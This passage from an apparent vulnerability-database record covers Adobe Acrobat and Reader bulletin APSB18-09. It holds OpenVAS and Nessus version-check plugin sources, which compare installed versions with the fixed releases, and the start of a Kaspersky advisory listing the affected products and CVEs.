2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_reader_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813240\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2018-4990\", \"CVE-2018-4947\", \"CVE-2018-4948\", \"CVE-2018-4966\",\n \"CVE-2018-4968\", \"CVE-2018-4978\", \"CVE-2018-4982\", \"CVE-2018-4984\",\n \"CVE-2018-4946\", \"CVE-2018-4952\", \"CVE-2018-4954\", \"CVE-2018-4958\",\n \"CVE-2018-4959\", \"CVE-2018-4961\", \"CVE-2018-4971\", \"CVE-2018-4974\",\n \"CVE-2018-4977\", \"CVE-2018-4980\", \"CVE-2018-4983\", \"CVE-2018-4988\",\n \"CVE-2018-4989\", \"CVE-2018-4950\", \"CVE-2018-4979\", \"CVE-2018-4949\",\n \"CVE-2018-4951\", \"CVE-2018-4955\", \"CVE-2018-4956\", \"CVE-2018-4957\",\n \"CVE-2018-4962\", \"CVE-2018-4963\", \"CVE-2018-4964\", \"CVE-2018-4967\",\n \"CVE-2018-4969\", \"CVE-2018-4970\", \"CVE-2018-4972\", \"CVE-2018-4973\",\n \"CVE-2018-4975\", \"CVE-2018-4976\", \"CVE-2018-4981\", \"CVE-2018-4986\",\n \"CVE-2018-4985\", \"CVE-2018-4953\", \"CVE-2018-4987\", \"CVE-2018-4965\",\n \"CVE-2018-4993\", \"CVE-2018-4995\", \"CVE-2018-4960\", \"CVE-2018-12812\",\n \"CVE-2018-12815\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 12:13:55 +0530 (Tue, 15 May 2018)\");\n script_name(\"Adobe Reader DC (Classic Track) Security Updates (apsb18-09) - Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Reader DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to double\n Free, heap overflow, use-after-free, out-of-bounds write, security bypass,\n out-of-bounds read, type confusion, untrusted pointer dereference, memory\n corruption, NTLM SSO hash theft and HTTP POST new line injection via XFA\n submission errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to bypass security, disclose information and run arbitrary code in the\n context of the current user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader DC (Classic Track)\n 2015.006.30418 and earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader DC (Classic Track) version\n 2015.006.30418 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_reader_dc_classic_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/ReaderDC/Classic/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"15.0\", test_version2:\"15.006.30417\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"15.006.30418 (2015.006.30418)\", install_path:path);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T01:14:42", "description": "The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 32, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109896);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/04/08 10:48:58\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader <= 2015.006.30417 / 2017.011.30079 / 2018.011.20038 Multiple Vulnerabilities (APSB18-09)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a\nversion prior or equal to 2015.006.30417, 2017.011.30079, or\n2018.011.20038. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::adobe_reader::get_app_info();\nconstraints = [\n { \"min_version\" : \"15.6\", \"max_version\" : \"15.6.30417\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"max_version\" : \"17.11.30079\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"15.7\", \"max_version\" : \"18.11.20038\", \"fixed_version\" : \"18.11.20040\" }\n];\n# using adobe_reader namespace check_version_and_report to properly detect Continuous vs Classic, \n# and limit ver segments to 3 (18.x.y vs 18.x.y.12345) with max_segs:3\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:27:17", "description": "The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 30, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOSX_ADOBE_READER_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109898", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109898);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Reader < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30419, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Reader\");\nbase_dir = app_info['path'] - \"/Applications\";\ntrack = get_kb_item(\"MacOSX/Adobe_Reader\"+base_dir+\"/Track\");\n\nif (!empty_or_null(track) && track == '2017')\n{\n constraints = [\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" }\n ];\n}\nelse\n{\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\n}\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:26:29", "description": "The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-17T00:00:00", "title": "Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:acrobat"], "id": "MACOSX_ADOBE_ACROBAT_APSB18-09.NASL", "href": "https://www.tenable.com/plugins/nessus/109897", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109897);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/04/22 9:47:13\");\n\n script_cve_id(\n \"CVE-2018-4947\",\n \"CVE-2018-4948\",\n \"CVE-2018-4949\",\n \"CVE-2018-4950\",\n \"CVE-2018-4951\",\n \"CVE-2018-4952\",\n \"CVE-2018-4953\",\n \"CVE-2018-4954\",\n \"CVE-2018-4955\",\n \"CVE-2018-4956\",\n \"CVE-2018-4957\",\n \"CVE-2018-4958\",\n \"CVE-2018-4959\",\n \"CVE-2018-4960\",\n \"CVE-2018-4961\",\n \"CVE-2018-4962\",\n \"CVE-2018-4963\",\n \"CVE-2018-4964\",\n \"CVE-2018-4965\",\n \"CVE-2018-4966\",\n \"CVE-2018-4967\",\n \"CVE-2018-4968\",\n \"CVE-2018-4969\",\n \"CVE-2018-4970\",\n \"CVE-2018-4971\",\n \"CVE-2018-4972\",\n \"CVE-2018-4973\",\n \"CVE-2018-4974\",\n \"CVE-2018-4975\",\n \"CVE-2018-4976\",\n \"CVE-2018-4977\",\n \"CVE-2018-4978\",\n \"CVE-2018-4979\",\n \"CVE-2018-4980\",\n \"CVE-2018-4981\",\n \"CVE-2018-4982\",\n \"CVE-2018-4983\",\n \"CVE-2018-4984\",\n \"CVE-2018-4985\",\n \"CVE-2018-4986\",\n \"CVE-2018-4987\",\n \"CVE-2018-4988\",\n \"CVE-2018-4989\",\n \"CVE-2018-4990\",\n \"CVE-2018-4993\",\n \"CVE-2018-4995\",\n \"CVE-2018-4996\",\n \"CVE-2018-12812\",\n \"CVE-2018-12815\"\n );\n script_bugtraq_id(\n 104102,\n 104167,\n 104168,\n 104169,\n 104171,\n 104172,\n 104173,\n 104174,\n 104175,\n 104176,\n 104177\n );\n\n script_name(english:\"Adobe Acrobat < 2015.006.30418 / 2017.011.30080 / 2018.011.20040 Multiple Vulnerabilities (APSB18-09) (macOS)\");\n script_summary(english:\"Checks the version of Adobe Acrobat.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Acrobat installed on the remote macOS or Mac OS X\nhost is a version prior to 2015.006.30418, 2017.011.30080,\nor 2018.011.20040. It is, therefore, affected by multiple\nvulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Acrobat 2015.006.30418 / 2017.011.30080\n/ 2018.011.20040 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4947\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_acrobat_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Acrobat\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp_info = vcf::get_app_info(app:\"Adobe Acrobat\");\n\n constraints = [\n { \"min_version\" : \"15.6\", \"fixed_version\" : \"15.6.30418\" },\n { \"min_version\" : \"17.8\", \"fixed_version\" : \"17.11.30080\" },\n { \"min_version\" : \"18.8\", \"fixed_version\" : \"18.11.20040\" }\n ];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:54:57", "bulletinFamily": "info", "cvelist": ["CVE-2018-4974", "CVE-2018-4970", "CVE-2018-4987", "CVE-2018-4981", "CVE-2018-4971", "CVE-2018-4948", "CVE-2018-4996", "CVE-2018-4995", "CVE-2018-4986", "CVE-2018-4961", "CVE-2018-4965", "CVE-2018-4967", "CVE-2018-4947", "CVE-2018-4993", "CVE-2018-4985", "CVE-2018-4976", "CVE-2018-4950", "CVE-2018-4984", "CVE-2018-4960", "CVE-2018-12812", "CVE-2018-4975", "CVE-2018-4983", "CVE-2018-4978", "CVE-2018-4951", "CVE-2018-12815", "CVE-2018-4955", "CVE-2018-4963", "CVE-2018-4959", "CVE-2018-4973", "CVE-2018-4968", "CVE-2018-4977", "CVE-2018-4953", "CVE-2018-4964", "CVE-2018-4982", "CVE-2018-4954", "CVE-2018-4956", "CVE-2018-4952", "CVE-2018-4966", "CVE-2018-4989", "CVE-2018-4990", "CVE-2018-4972", "CVE-2018-4962", "CVE-2018-4957", "CVE-2018-4958", "CVE-2018-4988", "CVE-2018-4969", "CVE-2018-4949", "CVE-2018-4980", "CVE-2018-4979"], "description": "### *Detect date*:\n05/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe Acrobat and Acrobat Reader. Malicious users can exploit these vulnerabilities to execute arbitrary code, obtain sensitive information and bypass security restrictions. Below is a complete list of vulnerabilities:\n\n### *Affected products*:\nAdobe Acrobat DC earlier than 2018.011.20040 \nAdobe Acrobat Reader DC earlier than 2018.011.20040 \nAdobe Acrobat 2017 earlier than 2017.011.30080 \nAdobe Acrobat Reader 2017 earlier than 2017.011.30080 \nAdobe Acrobat DC (Classic 2015) earlier than 2015.006.30418 \nAdobe Acrobat Reader DC (Classic 2015) earlier than 2015.006.30418\n\n### *Solution*:\nUpgrade to latest version \n[Download Adobe Acrobat DC](<http://supportdownloads.adobe.com/product.jsp?product=1&platform=Windows>) \n[Download Adobe Acrobat Reader DC](<https://get.adobe.com/ru/reader/>)\n\n### *Original advisories*:\n[APSB18-09](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Acrobat](<https://threats.kaspersky.com/en/product/Adobe-Acrobat/>)\n\n### *CVE-IDS*:\n[CVE-2018-4990](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4990>)0.0Unknown \n[CVE-2018-4947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4947>)0.0Unknown \n[CVE-2018-4948](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4948>)0.0Unknown \n[CVE-2018-4966](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4966>)0.0Unknown \n[CVE-2018-4968](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4968>)0.0Unknown \n[CVE-2018-4978](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4978>)0.0Unknown \n[CVE-2018-4982](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4982>)0.0Unknown \n[CVE-2018-4984](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4984>)0.0Unknown \n[CVE-2018-4996](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4996>)0.0Unknown \n[CVE-2018-4952](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4952>)0.0Unknown \n[CVE-2018-4954](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4954>)0.0Unknown \n[CVE-2018-4958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4958>)0.0Unknown \n[CVE-2018-4959](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4959>)0.0Unknown 